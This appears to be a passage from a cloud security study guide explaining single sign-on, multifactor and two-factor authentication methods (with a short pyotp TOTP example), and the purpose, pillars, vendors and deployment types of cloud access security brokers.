In the bad old days of the early Internet, it was common for organizations to require users to manage separate accounts for their desktops, email accounts, time-keeping systems, and so on. In many cases, each system would have different password complexity or password rotation requirements. This system not only wasted users’ time, but also led to forgotten passwords — and even worse, written down passwords! SSO is a saving grace for users and help desks alike.

Google applications are a great demonstration of SSO in action. When you sign in to your Google account, you’re able to access Gmail, Drive, YouTube, and all other Google services, without having to sign in again and again. Google apps are a pure example of single sign-on.

Multifactor authentication

Multifactor authentication (MFA) is an authentication method requiring a user to present two or more factors (which are forms of evidence) to the authentication mechanism; the factors can come in the form of knowledge, possession, or inherence.

  • Knowledge is something you know. This factor almost always comes in the form of a password or PIN. It should not be something that is easily guessed or researched, such as the user’s birthdate.
  • Possession is something you physically have with you. It can come in the form of a mobile phone with an authentication app installed, an RFID badge, RSA token with rotating code, or another tangible asset that can verify a user’s identity.
  • Inherence is something you, and only you, are. Think of biometric methods like fingerprints, retina scans, voice recognition, or anything else that uniquely physically identifies you.
  • (Bonus) Location is the user’s physical location. As devices and applications continue to become more location-aware, a user’s physical location is increasingly being used as a fourth potential factor for authentication.

Remember The term multifactor specifically requires that multiple factors be used for authentication. Use of two things you know (like two passwords), for example, is not MFA and is not more secure. The security benefit of MFA comes from the fact that each factor has a separate attack vector. Make sure that you remember that you must have at least two separate types of factors in place for your implementation to be considered multifactor.

Two-factor authentication (2FA) is the standard application of MFA and should really be the standard access method for sensitive systems and applications, as well as for all privileged access. Most cloud providers and many third-party access management platforms support 2FA. In addition to passwords, they usually require “something you have,” such as

  • SMS message to a mobile device: For this method, the target application sends the user an SMS with a numerical code; the user then inputs that code into the target application. This method is probably the oldest on this list, and it is gradually being phased out due to the ease with which SMS can be intercepted.
  • Software one-time password (OTP): This method involves using a mobile application like Google Authenticator and initially configuring it with a secret key. The app uses that secret key to generate a one-time password that changes every few seconds; the algorithm is time-synced with the target application. Whenever you authenticate to the target application, you use this software-based OTP as a second factor. Thanks to the time-sync, the target application is able to associate the OTP with your mobile device (and your identity). (See the sketch following this list.)
  • Hardware device: This method involves carrying and using a physical device that generates a rotating one-time password.
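
Here’s a minimal sketch of the software OTP idea from the list above, assuming the third-party pyotp package: a shared secret, established during enrollment, seeds a time-based one-time password generator, and the server later verifies the code the user types in. Authenticator apps such as Google Authenticator implement the same time-based algorithm.

    import pyotp

    # Shared secret established once during enrollment (normally delivered as a QR code)
    secret = pyotp.random_base32()
    totp = pyotp.TOTP(secret)

    # On the user's device: the authenticator app derives the current six-digit code
    current_code = totp.now()

    # On the server: verify the submitted code against the same secret and the clock
    print(totp.verify(current_code))   # True while the code is still within its window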

Cloud access security broker (CASB)

There was a time not long ago when popular belief was that the cloud was inherently insecure. That belief has mostly been dispelled, as mature CSPs have demonstrated an ability to secure systems and data better than many other organizations. The one issue that continues to haunt security professionals, including those in cloud security, is user error. Enter the CASB! A cloud access security broker, or CASB (pronounced kaz-bee), is a software application that sits between cloud users and cloud services and applications, while actively monitoring all cloud usage and implementing centralized controls to enforce security (see Figure 6-2). A CASB may be used to mitigate high-risk security events or to prevent such events altogether by enforcing security policies, stopping malware, and alerting security teams of potential security events.

FIGURE 6-2: Cloud access security broker (CASB).

A CASB can serve many purposes, but at a minimum, a CASB has four pillars:

  • Visibility: Provide visibility into an organization’s cloud usage, including who uses which cloud applications and from what devices. CASBs also enforce BYOD policies and can help detect, monitor, and secure Shadow IT.
  • Data security: Monitor the security of data owned and operated by the organization. CASBs can help prevent data exfiltration through cloud services and can enforce specific security policies based on the user, data, or activity.
  • Threat protection: By providing a comprehensive view of cloud usage, CASBs can help guard against insider threats, both malicious and accidental.
  • Compliance: Help organizations demonstrate compliance with regulatory requirements like HIPAA, PCI DSS, and GDPR.

From a security perspective, most CASBs are able to enforce policies related to authentication and authorization (including SSO), logging, encryption, malware prevention, and more.

The CASB market has exploded in recent years. Some popular names in the space include

  • Cisco Cloudlock
  • Netskope
  • Bitglass
  • Proofpoint
  • Forcepoint CASB
  • Oracle CASB
  • McAfee MVISION Cloud

The three primary types of CASB solutions are

  • Forward proxy: This type of CASB sits close to the user (like on their desktop or mobile phone) and uses an encrypted man-in-the-middle technique to securely inspect and forward all cloud traffic for the user. This type of CASB requires you to install certificates on every single device that needs to be monitored, making it challenging to deploy in large distributed organizations.
  • Reverse proxy: This type of CASB sits close to the CSP and integrates into identity services like Okta or OneLogin to force users’ traffic through the CASB for inline monitoring. This type eliminates the need to individually install certificates on user devices, but reverse proxy CASBs are not compatible with client-server applications that have hardcoded hostnames.
  • API-based: This type of CASB allows organizations to enable CASB protection to any user on any device from any location. API-based CASBs monitor data within the cloud itself, rather than on a proxy at the perimeter. There’s no need to install anything on user devices, and it’s also much more performance-friendly than both proxy-based methods. A major limitation, however, is that not all cloud applications provide API support.